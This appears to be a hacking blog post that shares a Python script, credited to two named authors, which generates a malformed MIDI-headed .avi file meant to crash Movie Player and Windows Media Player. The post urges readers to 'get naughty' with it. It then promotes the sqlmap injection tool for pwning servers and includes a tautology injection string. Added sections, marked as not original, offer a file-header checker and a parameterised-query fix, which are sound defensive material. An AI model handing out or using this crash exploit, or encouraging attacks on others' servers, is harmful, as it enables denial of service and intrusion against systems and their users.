I came across an interesting buffer overflow exploit that triggers a memory-handling bug in Movie Player and also works against Windows Media Player. The exploit performs a Denial of Service attack: it makes the application crash. Those who don't know about buffer overflows can read the article here.
When it works, the crash often happens every time the victim opens the folder in which the exploit file is placed. Here is the exploit, coded by ^Xecuti0N3r & d3M0l!tioN3r:
#!/usr/bin/python
#(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit
#(+)Software Link: http://www.movieplay.org/download.php
#(+)Software : Movie Player
#(+)Version : v4.82
#(+)Tested On : WIN-XP SP3
#(+) Date : 31.03.2011
#(+) Hour : 3:37 PM
#Similar Bug was found by cr4wl3r in MediaPlayer Classic
import time

# Where the generated file is written
ExploitLocation = "C:\\MoviePlayerExploit.avi"
# 14-byte payload: an "MThd" MIDI header chunk (header length 6, all other
# header fields zero) that is saved under an .avi extension
memoryloc = b'\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00'

print(" _______________________________________________________________________")
print("(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit")
print("(+) Software Link: http://www.movieplay.org/download.php")
print("(+) Software : Movie Player")
print("(+) Version : v4.82")
print("(+) Tested On : WIN-XP SP3")
print("(+) Date : 31.03.2011")
print("(+) Hour : 13:37 PM ")
print("____________________________________________________________________\n ")
time.sleep(2)
print("\nGenerating the exploit file !!!")
# Write the file first, then announce it
with open(ExploitLocation, "wb") as f:
    f.write(memoryloc)
time.sleep(2)
print("\n\nMoviePlayerExploit.avi file generated!!")
time.sleep(2)
print("\n\n(+) Done!\n")
print("(+) Now Just open MoviePlayerExploit.avi with Movie Player and Kaboooommm !! ;) \n")
print("(+) Most of the times there is a crash\n whenever you open the folder where the MoviePlayerExploit.avi is stored :D \n")
time.sleep(2)
time.sleep(1)
print("\n\n\n########################################################################\n (+)Exploit Coded by: ^Xecuti0N3r & d3M0l!tioN3r \n")
print("(+)^Xecuti0N3r: E-mail \n")
print("(+)d3M0l!tioN3r: E-mail \n")
print("(+)Special Thanks to: MaxCaps & aNnIh!LatioN3r \n")
print("########################################################################\n\n")
time.sleep(4)
You need Python to run it; once the file is generated, test it in a virtual machine. Try opening it with Windows Media Player: it crashes instantly. The more ingenious of you can get naughty with it :)
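The file the script writes is a 14-byte MIDI header chunk ("MThd", header length 6, format 0, zero tracks, zero time division) stored under an .avi name, so its extension and its actual contents disagree and the header itself declares no track data. As an added example that is not part of the original post or the exploit authors' code, here is a small Python checker a defender could run over files before a player or preview handler touches them: it flags files whose leading bytes do not match what the extension promises, and MIDI headers whose fields fall outside what the Standard MIDI File format allows. The extension-to-magic table, the function names and the second sample file are this example's own assumptions; the first sample is the payload from the script above.

```python
import os
import struct

# Constructed sample: the 14-byte payload from the script on this page (an
# "MThd" chunk with header length 6 and every header field zero), as it
# would be read back from MoviePlayerExploit.avi.
SAMPLE_PAYLOAD = b"\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"

# Leading magic bytes that a few container formats begin with. This table is
# an assumption for the example, not a complete list of media formats.
MAGIC_BY_EXTENSION = {
    ".mid": b"MThd",
    ".midi": b"MThd",
    ".avi": b"RIFF",
    ".wav": b"RIFF",
}


def parse_midi_header(data):
    """Parse a Standard MIDI File 'MThd' chunk from the start of `data`.

    Returns a dict with the chunk length and the three header fields
    (format, number of tracks, time division), or None when the data does
    not begin with a complete 14-byte MThd chunk.
    """
    if len(data) < 14 or data[:4] != b"MThd":
        return None
    length, fmt, ntrks, division = struct.unpack(">IHHH", data[4:14])
    return {"length": length, "format": fmt, "ntrks": ntrks, "division": division}


def inspect_media_file(filename, data):
    """Return a list of findings (strings) about a file's header.

    Checks performed:
      * the leading bytes disagree with what the extension promises
      * for a MIDI header: length must be 6, format 0-2, at least one
        track, a non-zero time division
      * the file ends right after the MThd chunk, i.e. carries no track data
    An empty list means nothing looked wrong.
    """
    findings = []
    ext = os.path.splitext(filename)[1].lower()
    expected_magic = MAGIC_BY_EXTENSION.get(ext)
    if expected_magic is not None and not data.startswith(expected_magic):
        findings.append("extension %s promises %r but file starts with %r"
                        % (ext, expected_magic, data[:4]))
    hdr = parse_midi_header(data)
    if hdr is not None:
        if hdr["length"] != 6:
            findings.append("MThd header length %d, expected 6" % hdr["length"])
        if hdr["format"] > 2:
            findings.append("MThd format %d is not 0, 1 or 2" % hdr["format"])
        if hdr["ntrks"] == 0:
            findings.append("MThd declares zero tracks")
        if hdr["division"] == 0:
            findings.append("MThd time division is zero")
        if len(data) <= 8 + hdr["length"]:
            findings.append("no track chunks follow the MThd header")
    return findings


if __name__ == "__main__":
    for line in inspect_media_file("MoviePlayerExploit.avi", SAMPLE_PAYLOAD):
        print("finding: " + line)
```

Run on the payload from the script, the checker reports the extension mismatch, the zero track count, the zero time division and the missing track data; a minimal well-formed .mid file (one track, a non-zero division, an end-of-track event) produces no findings. A check like this is cheap enough to run in a mail gateway or an upload handler before a file reaches a player or a shell preview handler.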
cheers..
Sqlmap is an open source command-line automatic SQL injection tool whose goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options: perform an extensive back-end database management system fingerprint; retrieve the DBMS session user and database; enumerate users, password hashes, privileges and databases; dump entire DBMS tables/columns or only those the user specifies; run their own SQL statements; read or write text or binary files on the file system; execute arbitrary commands on the operating system; establish an out-of-band stateful connection between the attacker box and the database server via a Metasploit payload stager, database stored procedure buffer overflow exploitation or an SMB relay attack; and more.
Enthusiasts can experiment with its options and pwn many of the servers out there, or test their skills at securing their own servers. But remember, sqlmap is a tool: it might help you find and exploit vulnerabilities and injections, but in the end you really must have a good knowledge of SQL for some real pwning out there..
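What sqlmap automates is finding places where user input becomes part of the SQL text, so the fix on the defending side is to keep input out of the SQL text altogether. As an added example that is not part of the original post or of sqlmap, here is the vulnerable pattern beside its hardened form in Python, using an in-memory SQLite database with constructed rows: the first function builds the statement by string formatting, the second binds the value as a parameter. The table, the rows and the function names are this example's own assumptions.

```python
import sqlite3


def make_db():
    """Build an in-memory database with a few constructed user rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (name, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    conn.commit()
    return conn


def find_user_vulnerable(conn, name):
    """Builds the statement by string formatting: whatever the caller passes
    becomes part of the SQL text, so a quote inside `name` changes the query
    instead of being looked up as data."""
    sql = "SELECT name, role FROM users WHERE name = '%s'" % name
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name):
    """Same lookup with a bound parameter: the driver hands `name` to the
    engine as a value, never as SQL, so the statement's structure is fixed."""
    sql = "SELECT name, role FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def demo():
    """Run both lookups on an ordinary name, on a name that legitimately
    contains an apostrophe, and on a constructed hostile input; return the
    results so the difference between the two functions can be checked."""
    conn = make_db()
    ordinary = "alice"
    apostrophe = "o'brien"        # a real name that happens to contain a quote
    hostile = "x' OR '1'='1"      # constructed test input, the classic tautology
    results = {
        "vulnerable_ordinary": find_user_vulnerable(conn, ordinary),
        "vulnerable_hostile": find_user_vulnerable(conn, hostile),
        "safe_ordinary": find_user_safe(conn, ordinary),
        "safe_hostile": find_user_safe(conn, hostile),
        "safe_apostrophe": find_user_safe(conn, apostrophe),
    }
    # The string-built query is not even correct on honest input: the
    # apostrophe in "o'brien" breaks the statement and the engine rejects it.
    try:
        results["vulnerable_apostrophe"] = find_user_vulnerable(conn, apostrophe)
    except sqlite3.Error:
        results["vulnerable_apostrophe"] = "error"
    return results


if __name__ == "__main__":
    for key, value in sorted(demo().items()):
        print("%-22s %r" % (key, value))
```

The string-built lookup returns every row for the hostile input and fails outright on a legitimate name containing an apostrophe; the parameterised lookup returns exactly the matching row in the first case and an empty result in the other two. Scanners such as sqlmap find the first kind of code; reviewing query construction for the second pattern (and for places where table or column names are still concatenated, which parameters cannot cover) is the corresponding defensive check.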
You can download sqlmap 0.7 here:
Linux source: sqlmap-0.7.tar.gz
Windows portable: sqlmap-0.7_exe.zip